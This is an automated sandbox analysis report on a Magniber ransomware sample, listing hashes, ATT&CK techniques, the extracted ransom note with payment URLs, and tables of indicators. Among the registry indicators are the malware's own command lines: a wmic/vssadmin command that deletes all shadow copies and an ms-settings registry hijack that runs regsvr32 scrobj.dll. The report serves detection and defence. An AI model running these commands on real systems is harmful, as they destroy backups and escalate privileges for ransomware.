magniber | 02878d52de142bdbeb5102ade3fe322bac4b2577f7cd316583e3ed18840965c5

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
04-10-2024 12:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1367b5544d880a04248b3552c3232c3e_JaffaCakes118.dll
Size

20KB
MD5

1367b5544d880a04248b3552c3232c3e
SHA1

587c8acd42db7c7efe49242f4ec6fde0ec8e7aeb
SHA256

02878d52de142bdbeb5102ade3fe322bac4b2577f7cd316583e3ed18840965c5
SHA512

fc745fe43577959c7629bf5f530286ac74809ef70520334b4143787928eb6aa3c8a57ef18947b0346a2c26699bbb0c9905cf88abec4e7e839a69b2614fde9f73
SSDEEP

384:lQEBWKZqvIX/r3QtqM+VFc0H0SsdcCFNF2w3VX1Hz70TozIM4Utl8M0:lQr0qaMkV3reFH3nzUPM4w8

Score

10^/10

magniber defense_evasion discovery execution impact ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://f6d0ee70e658e6b000qbvpseec.m647u2xsjtlfyzuevlxjiiwjsg2btyhmbxbjz4in4hm76u6hjzc62wad.onion/qbvpseec Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://f6d0ee70e658e6b000qbvpseec.gosmark.space/qbvpseec http://f6d0ee70e658e6b000qbvpseec.ourunit.xyz/qbvpseec http://f6d0ee70e658e6b000qbvpseec.topsaid.site/qbvpseec http://f6d0ee70e658e6b000qbvpseec.iecard.top/qbvpseec Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://f6d0ee70e658e6b000qbvpseec.m647u2xsjtlfyzuevlxjiiwjsg2btyhmbxbjz4in4hm76u6hjzc62wad.onion/qbvpseec

http://f6d0ee70e658e6b000qbvpseec.gosmark.space/qbvpseec

http://f6d0ee70e658e6b000qbvpseec.ourunit.xyz/qbvpseec

http://f6d0ee70e658e6b000qbvpseec.topsaid.site/qbvpseec

http://f6d0ee70e658e6b000qbvpseec.iecard.top/qbvpseec

Signatures

Detect magniber ransomware 1 IoCs

resource	yara_rule
behavioral2/memory/3016-0-0x0000020D5CD00000-0x0000020D5D2D0000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 50 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	412	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3532	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1284	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	232	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4412	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5648	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5644	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3936	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2744	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5148	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5944	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5772	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4244	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5264	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6140	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5916	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5920	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5164	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2340	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3612	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2996	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5644	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6100	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5748	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5980	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2404	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6068	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5292	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5196	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5260	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5200	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1404	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2240	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5332	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5640	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4808	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5760	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	368	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1568	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5932	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3028	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6128	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4680	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1392	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6088	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2108	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5768	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3880	3408	cmd.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	720	3408	vssadmin.exe	85
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5780	3408	vssadmin.exe	85

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (79) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Suspicious use of SetThreadContext 12 IoCs

description	pid	Process	procid_target
PID 3016 set thread context of 620	3016	rundll32.exe	50
PID 3016 set thread context of 768	3016	rundll32.exe	51
PID 3016 set thread context of 3120	3016	rundll32.exe	52
PID 3016 set thread context of 3384	3016	rundll32.exe	55
PID 3016 set thread context of 3564	3016	rundll32.exe	57
PID 3016 set thread context of 3748	3016	rundll32.exe	58
PID 3016 set thread context of 3840	3016	rundll32.exe	59
PID 3016 set thread context of 3908	3016	rundll32.exe	60
PID 3016 set thread context of 3996	3016	rundll32.exe	61
PID 3016 set thread context of 3584	3016	rundll32.exe	62
PID 3016 set thread context of 952	3016	rundll32.exe	75
PID 3016 set thread context of 1980	3016	rundll32.exe	76

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Interacts with shadow copies 3 TTPs 30 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
2996	vssadmin.exe
5332	vssadmin.exe
1392	vssadmin.exe
4244	vssadmin.exe
5916	vssadmin.exe
1404	vssadmin.exe
2240	vssadmin.exe
5640	vssadmin.exe
5772	vssadmin.exe
3612	vssadmin.exe
5932	vssadmin.exe
6088	vssadmin.exe
720	vssadmin.exe
5264	vssadmin.exe
5748	vssadmin.exe
2340	vssadmin.exe
5980	vssadmin.exe
5196	vssadmin.exe
412	vssadmin.exe
3936	vssadmin.exe
1568	vssadmin.exe
3028	vssadmin.exe
232	vssadmin.exe
6140	vssadmin.exe
5780	vssadmin.exe
2404	vssadmin.exe
2108	vssadmin.exe
4808	vssadmin.exe
4412	vssadmin.exe
5648	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	Explorer.EXE

Modifies registry class 50 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command	TextInputHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command	DllHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	DllHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command	StartMenuExperienceHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	DllHost.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	DllHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1"	sihost.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1720	notepad.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
3016	rundll32.exe
3016	rundll32.exe
4376	msedge.exe
4376	msedge.exe
1068	msedge.exe
1068	msedge.exe
4536	identity_helper.exe
4536	identity_helper.exe
1388	msedge.exe
1388	msedge.exe
1388	msedge.exe
1388	msedge.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
3384	Explorer.EXE
3120	taskhostw.exe

Suspicious behavior: MapViewOfSection 12 IoCs

pid	Process
3016	rundll32.exe
3016	rundll32.exe
3016	rundll32.exe
3016	rundll32.exe
3016	rundll32.exe
3016	rundll32.exe
3016	rundll32.exe
3016	rundll32.exe
3016	rundll32.exe
3016	rundll32.exe
3016	rundll32.exe
3016	rundll32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3384	Explorer.EXE
Token: SeCreatePagefilePrivilege	3384	Explorer.EXE
Token: SeShutdownPrivilege	3384	Explorer.EXE
Token: SeCreatePagefilePrivilege	3384	Explorer.EXE
Token: SeTakeOwnershipPrivilege	3840	StartMenuExperienceHost.exe
Token: SeRestorePrivilege	3840	StartMenuExperienceHost.exe
Token: SeShutdownPrivilege	3384	Explorer.EXE
Token: SeCreatePagefilePrivilege	3384	Explorer.EXE
Token: SeShutdownPrivilege	3384	Explorer.EXE
Token: SeCreatePagefilePrivilege	3384	Explorer.EXE
Token: SeTakeOwnershipPrivilege	3840	StartMenuExperienceHost.exe
Token: SeRestorePrivilege	3840	StartMenuExperienceHost.exe
Token: SeShutdownPrivilege	3384	Explorer.EXE
Token: SeCreatePagefilePrivilege	3384	Explorer.EXE
Token: SeShutdownPrivilege	3384	Explorer.EXE
Token: SeCreatePagefilePrivilege	3384	Explorer.EXE
Token: SeShutdownPrivilege	3384	Explorer.EXE
Token: SeCreatePagefilePrivilege	3384	Explorer.EXE
Token: SeShutdownPrivilege	3384	Explorer.EXE
Token: SeCreatePagefilePrivilege	3384	Explorer.EXE
Token: SeShutdownPrivilege	3384	Explorer.EXE
Token: SeCreatePagefilePrivilege	3384	Explorer.EXE
Token: SeShutdownPrivilege	3384	Explorer.EXE
Token: SeCreatePagefilePrivilege	3384	Explorer.EXE
Token: SeTakeOwnershipPrivilege	3840	StartMenuExperienceHost.exe
Token: SeRestorePrivilege	3840	StartMenuExperienceHost.exe
Token: SeIncreaseQuotaPrivilege	4692	wmic.exe
Token: SeSecurityPrivilege	4692	wmic.exe
Token: SeTakeOwnershipPrivilege	4692	wmic.exe
Token: SeLoadDriverPrivilege	4692	wmic.exe
Token: SeSystemProfilePrivilege	4692	wmic.exe
Token: SeSystemtimePrivilege	4692	wmic.exe
Token: SeProfSingleProcessPrivilege	4692	wmic.exe
Token: SeIncBasePriorityPrivilege	4692	wmic.exe
Token: SeCreatePagefilePrivilege	4692	wmic.exe
Token: SeBackupPrivilege	4692	wmic.exe
Token: SeRestorePrivilege	4692	wmic.exe
Token: SeShutdownPrivilege	4692	wmic.exe
Token: SeDebugPrivilege	4692	wmic.exe
Token: SeSystemEnvironmentPrivilege	4692	wmic.exe
Token: SeRemoteShutdownPrivilege	4692	wmic.exe
Token: SeUndockPrivilege	4692	wmic.exe
Token: SeManageVolumePrivilege	4692	wmic.exe
Token: 33	4692	wmic.exe
Token: 34	4692	wmic.exe
Token: 35	4692	wmic.exe
Token: 36	4692	wmic.exe
Token: SeIncreaseQuotaPrivilege	4692	wmic.exe
Token: SeSecurityPrivilege	4692	wmic.exe
Token: SeTakeOwnershipPrivilege	4692	wmic.exe
Token: SeLoadDriverPrivilege	4692	wmic.exe
Token: SeSystemProfilePrivilege	4692	wmic.exe
Token: SeSystemtimePrivilege	4692	wmic.exe
Token: SeProfSingleProcessPrivilege	4692	wmic.exe
Token: SeIncBasePriorityPrivilege	4692	wmic.exe
Token: SeCreatePagefilePrivilege	4692	wmic.exe
Token: SeBackupPrivilege	4692	wmic.exe
Token: SeRestorePrivilege	4692	wmic.exe
Token: SeShutdownPrivilege	4692	wmic.exe
Token: SeDebugPrivilege	4692	wmic.exe
Token: SeSystemEnvironmentPrivilege	4692	wmic.exe
Token: SeRemoteShutdownPrivilege	4692	wmic.exe
Token: SeUndockPrivilege	4692	wmic.exe
Token: SeManageVolumePrivilege	4692	wmic.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe
1068	msedge.exe

Suspicious use of UnmapMainImage 3 IoCs

pid	Process
3384	Explorer.EXE
3908	RuntimeBroker.exe
3584	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1980 wrote to memory of 1720	1980	RuntimeBroker.exe	86
PID 1980 wrote to memory of 1720	1980	RuntimeBroker.exe	86
PID 1980 wrote to memory of 3656	1980	RuntimeBroker.exe	87
PID 1980 wrote to memory of 3656	1980	RuntimeBroker.exe	87
PID 1980 wrote to memory of 4692	1980	RuntimeBroker.exe	88
PID 1980 wrote to memory of 4692	1980	RuntimeBroker.exe	88
PID 1980 wrote to memory of 4336	1980	RuntimeBroker.exe	89
PID 1980 wrote to memory of 4336	1980	RuntimeBroker.exe	89
PID 1980 wrote to memory of 788	1980	RuntimeBroker.exe	90
PID 1980 wrote to memory of 788	1980	RuntimeBroker.exe	90
PID 3840 wrote to memory of 4348	3840	StartMenuExperienceHost.exe	95
PID 3840 wrote to memory of 4348	3840	StartMenuExperienceHost.exe	95
PID 3840 wrote to memory of 4348	3840	StartMenuExperienceHost.exe	95
PID 3840 wrote to memory of 2936	3840	StartMenuExperienceHost.exe	97
PID 3840 wrote to memory of 2936	3840	StartMenuExperienceHost.exe	97
PID 3840 wrote to memory of 2936	3840	StartMenuExperienceHost.exe	97
PID 3840 wrote to memory of 3464	3840	StartMenuExperienceHost.exe	98
PID 3840 wrote to memory of 3464	3840	StartMenuExperienceHost.exe	98
PID 3840 wrote to memory of 3464	3840	StartMenuExperienceHost.exe	98
PID 4336 wrote to memory of 3692	4336	cmd.exe	101
PID 4336 wrote to memory of 3692	4336	cmd.exe	101
PID 788 wrote to memory of 1132	788	cmd.exe	102
PID 788 wrote to memory of 1132	788	cmd.exe	102
PID 3532 wrote to memory of 3824	3532	cmd.exe	111
PID 3532 wrote to memory of 3824	3532	cmd.exe	111
PID 1284 wrote to memory of 2080	1284	cmd.exe	113
PID 1284 wrote to memory of 2080	1284	cmd.exe	113
PID 3656 wrote to memory of 1068	3656	cmd.exe	114
PID 3656 wrote to memory of 1068	3656	cmd.exe	114
PID 1068 wrote to memory of 2444	1068	msedge.exe	116
PID 1068 wrote to memory of 2444	1068	msedge.exe	116
PID 3824 wrote to memory of 1700	3824	ComputerDefaults.exe	117
PID 3824 wrote to memory of 1700	3824	ComputerDefaults.exe	117
PID 2080 wrote to memory of 4704	2080	ComputerDefaults.exe	119
PID 2080 wrote to memory of 4704	2080	ComputerDefaults.exe	119
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
PID 1068 wrote to memory of 2832	1068	msedge.exe	125
